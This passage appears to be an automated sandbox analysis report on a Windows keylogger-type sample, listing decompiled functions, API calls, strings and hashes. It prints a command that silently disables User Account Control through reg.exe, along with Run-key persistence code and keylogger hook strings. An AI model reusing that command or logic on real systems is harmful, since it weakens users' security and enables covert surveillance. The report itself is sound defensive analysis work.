                                                                                • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 43%
                                                                                			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                                                                				char _v20;
                                                                                				void* _t15;
                                                                                				void* _t18;
                                                                                				signed int _t20;
                                                                                				void* _t25;
                                                                                				signed int _t28;
                                                                                				signed int _t29;
                                                                                				signed int _t36;
                                                                                				void* _t46;
                                                                                				signed int _t57;
                                                                                				void* _t58;
                                                                                
                                                                                				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				_t57 = __eax + 2;
                                                                                				_t15 = _t57 + _t57;
                                                                                				L00413E84();
                                                                                				_t25 = _t15;
                                                                                				_t28 = _t57;
                                                                                				_t46 = _t25;
                                                                                				_t29 = _t28 >> 2;
                                                                                				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
                                                                                				_t6 = _t57 - 2; // 0x0
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                                                                				_t58 = _t18;
                                                                                				_t36 = _t6 >> 2;
                                                                                				_t20 = memcpy(_t25, _t58, _t36 << 2);
                                                                                				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
                                                                                				L00413EBE();
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _a4;
                                                                                			}

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 391609400-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00413B0F() {
                                                                                				struct tagMSG _v32;
                                                                                				char _v292;
                                                                                				int _t15;
                                                                                
                                                                                				GetModuleFileNameA(0,  &_v292, 0x104);
                                                                                				 *0x41c204 = E00413BC8();
                                                                                				0x41c200->cbSize = 0x58;
                                                                                				 *0x41c208 = 1;
                                                                                				 *0x41c210 = 0x401;
                                                                                				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
                                                                                				lstrcpynA(0x41c218,  *0x41b160, 0x40);
                                                                                				 *0x41c20c = 7;
                                                                                				Shell_NotifyIconA(0, 0x41c200);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push( &_v32);
                                                                                				while(1) {
                                                                                					_t15 = GetMessageA();
                                                                                					if(_t15 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					TranslateMessage( &_v32);
                                                                                					DispatchMessageA( &_v32);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push( &_v32);
                                                                                				}
                                                                                				return _t15;
                                                                                			}







                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                                                                  • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                                                                  • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                                                                  • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                                                                • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                                                                • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                                                                • GetMessageA.USER32 ref: 00413BA1
                                                                                • TranslateMessage.USER32(?), ref: 00413BAB
                                                                                • DispatchMessageA.USER32 ref: 00413BB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 1970332568-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                                                                • String ID: Offline Keylogger Stopped$[INFO]
                                                                                • API String ID: 2222684746-1731565019
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
                                                                                				long _t15;
                                                                                				long _t18;
                                                                                				void* _t21;
                                                                                				int _t22;
                                                                                				void* _t28;
                                                                                
                                                                                				_t15 = RegCreateKeyW(_a4, _a8,  &_a8);
                                                                                				if(_t15 != 0) {
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					return 0;
                                                                                				} else {
                                                                                					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
                                                                                					_t17 = _t15 + _t15 + 2;
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t22 = 0;
                                                                                					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17);
                                                                                					RegCloseKey(_a8);
                                                                                					if(_t18 == 0) {
                                                                                						_t22 = 1;
                                                                                					}
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					return _t22;
                                                                                				}
                                                                                			}









                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7D5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7E3
                                                                                • RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                                                                • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B801
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B810
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B81F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                                                • String ID:
                                                                                • API String ID: 1037601705-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E0040A0E1() {
                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                				struct _STARTUPINFOA _v88;
                                                                                				signed int _t17;
                                                                                
                                                                                				_t17 = 0x11;
                                                                                				memset( &_v88, 0, _t17 << 2);
                                                                                				_v88.cb = 0x44;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                				CloseHandle(_v20);
                                                                                				return CloseHandle(_v20.hThread);
                                                                                			}







                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                                                                • CloseHandle.KERNEL32(?), ref: 0040A12E
                                                                                • CloseHandle.KERNEL32(?), ref: 0040A133
                                                                                Strings
                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                                                                • D, xrefs: 0040A0F6
                                                                                • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateProcess
                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                                                                • API String ID: 2922976086-1747066916
                                                                                • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                                                                • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                                                                • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                                                                • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 2478582372-0
                                                                                • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                                                                • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                                                                • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                                                                • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 914748455-0
                                                                                • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                                                                • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                                                                • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                                                                • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E00413BC8() {
                                                                                				char _v20;
                                                                                				struct _WNDCLASSEXA _v68;
                                                                                				struct HWND__* _t21;
                                                                                				signed int _t23;
                                                                                
                                                                                				_t23 = 0xb;
                                                                                				memset( &(_v68.style), 0, _t23 << 2);
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsw");
                                                                                				_v68.cbSize = 0x30;
                                                                                				asm("movsb");
                                                                                				_v68.lpszClassName =  &_v20;
                                                                                				_v68.style = 0;
                                                                                				_v68.lpfnWndProc = E00413C3F;
                                                                                				_v68.cbClsExtra = 0;
                                                                                				_v68.cbWndExtra = 0;
                                                                                				_v68.lpszMenuName = 0;
                                                                                				if(RegisterClassExA( &_v68) == 0) {
                                                                                					L3:
                                                                                					return 0;
                                                                                				}
                                                                                				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                                                                				if(_t21 == 0) {
                                                                                					GetLastError();
                                                                                					goto L3;
                                                                                				}
                                                                                				return _t21;
                                                                                			}








                                                                                APIs
                                                                                • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                                                                • CreateWindowExA.USER32 ref: 00413C29
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                • API String ID: 2877667751-2410386613
                                                                                • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                                                                • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                                                                • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                                                                • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                                                                  • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                                                                  • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                                                                  • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                                                                • atoi.MSVCRT ref: 004032E1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                                                                Strings
                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                                                                • CurrentBuildNumber, xrefs: 004032BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                                                                • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 1453687294-3377751560
                                                                                • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                                                                • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                                                                • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                                                                • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004126EF(char _a4) {
                                                                                				void* _t2;
                                                                                				void* _t3;
                                                                                
                                                                                				_t1 =  &_a4; // 0x40e322
                                                                                				_t2 = GetCurrentProcess();
                                                                                				_t3 = GetCurrentThread();
                                                                                				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
                                                                                			}






                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                                                                • GetCurrentThread.KERNEL32 ref: 00412705
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Current$Process$DuplicateHandleThread
                                                                                • String ID: "@
                                                                                • API String ID: 3566409357-445313631
                                                                                • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                                                                • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                                                                • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                                                                • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@
                                                                                • String ID:
                                                                                • API String ID: 250200872-0
